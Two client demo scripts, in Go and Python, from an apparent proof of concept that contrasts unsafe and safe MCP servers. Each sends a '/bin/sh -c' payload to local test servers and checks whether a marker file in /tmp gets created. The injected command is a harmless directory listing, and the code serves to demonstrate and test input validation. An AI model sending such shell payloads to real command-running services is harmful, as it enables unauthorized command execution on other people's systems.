File: Go_SDK_POC/mcp_client_demo.go
// MCP CLIENT DEMO (Go)
// Sends a crafted payload to the target MCP server (unsafe or safe)
// Demonstrates OS command execution (unsafe) or rejection (safe)
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"io/ioutil"
	"net/http"
	"os"
	"time"
)

type RunRequest struct {
	Command string   `json:"command"`
	Args    []string `json:"args"`
}

const marker = "/tmp/mcp_poc_ls.txt"

func testServer(url string, payload RunRequest, markerExpected bool) {
	if _, err := os.Stat(marker); err == nil {
		os.Remove(marker)
	}
	b, _ := json.Marshal(payload)
	resp, err := http.Post(url, "application/json", bytes.NewReader(b))
	if err != nil {
		fmt.Println("POST error:", err)
		return
	}
	defer resp.Body.Close()
	body, _ := ioutil.ReadAll(resp.Body)
	fmt.Printf("POST %s with payload: %+v\n", url, payload)
	fmt.Println("Response:", resp.StatusCode, string(body))
	// Give the OS a moment to write the file
	time.Sleep(1 * time.Second)
	if markerExpected {
		if _, err := os.Stat(marker); err == nil {
			fmt.Printf("✓ Marker file created: %s\n", marker)
		} else {
			fmt.Printf("✗ Marker file NOT created: %s\n", marker)
		}
	} else {
		if _, err := os.Stat(marker); err == nil {
			fmt.Printf("✗ Marker file should NOT exist, but found: %s\n", marker)
		} else {
			fmt.Printf("✓ Marker file not created as expected.\n")
		}
	}
}

func main() {
	payload := RunRequest{
		Command: "/bin/sh",
		Args:    []string{"-c", "ls -lrth / > /tmp/mcp_poc_ls.txt"},
	}
	allowedPayload := RunRequest{
		Command: "ls",
		Args:    []string{"-lrth", "/"},
	}
	fmt.Println("--- Testing UNSAFE Go MCP server ---")
	testServer("http://127.0.0.1:6005/run", payload, true)
	fmt.Println("\n--- Testing SAFE Go MCP server ---")
	testServer("http://127.0.0.1:6006/run", payload, false)
	fmt.Println("\n--- Testing SAFE Go MCP server with allowed payload ---")
	testServer("http://127.0.0.1:6006/run", allowedPayload, false)
}

File: Python_SDK_POC/mcp_client_demo.py
#!/usr/bin/env python3
"""Python client demo for unsafe vs safe MCP server behavior."""

from __future__ import annotations

import time
from pathlib import Path

import requests

UNSAFE_URL = "http://127.0.0.1:5005/run"
SAFE_URL = "http://127.0.0.1:5006/run"
MARKER = Path("/tmp/mcp_poc_ls.txt")

attack_payload = {
	"command": "/bin/sh",
	"args": ["-c", f"ls -lrth / > {MARKER}"],
}

allowed_payload = {
	"command": "ls",
	"args": ["-lrth", "/"],
}


def test_server(url: str, payload: dict, marker_expected: bool) -> None:
	if MARKER.exists():
		MARKER.unlink()

	print(f"POST {url} with payload: {payload}")
	r = requests.post(url, json=payload, timeout=15)
	print("Response:", r.status_code, r.text)

	time.sleep(1)
	exists = MARKER.exists()
	if marker_expected and exists:
		print(f"OK marker created: {MARKER}")
	elif marker_expected and not exists:
		print(f"FAIL marker not created: {MARKER}")
	elif not marker_expected and exists:
		print(f"FAIL marker should not exist but does: {MARKER}")
	else:
		print("OK marker not created as expected")


if __name__ == "__main__":
	print("--- Testing UNSAFE Python MCP server ---")
	test_server(UNSAFE_URL, attack_payload, marker_expected=True)

	print("\n--- Testing SAFE Python MCP server (attack payload) ---")
	test_server(SAFE_URL, attack_payload, marker_expected=False)

	print("\n--- Testing SAFE Python MCP server (allowed payload) ---")
	test_server(SAFE_URL, allowed_payload, marker_expected=False)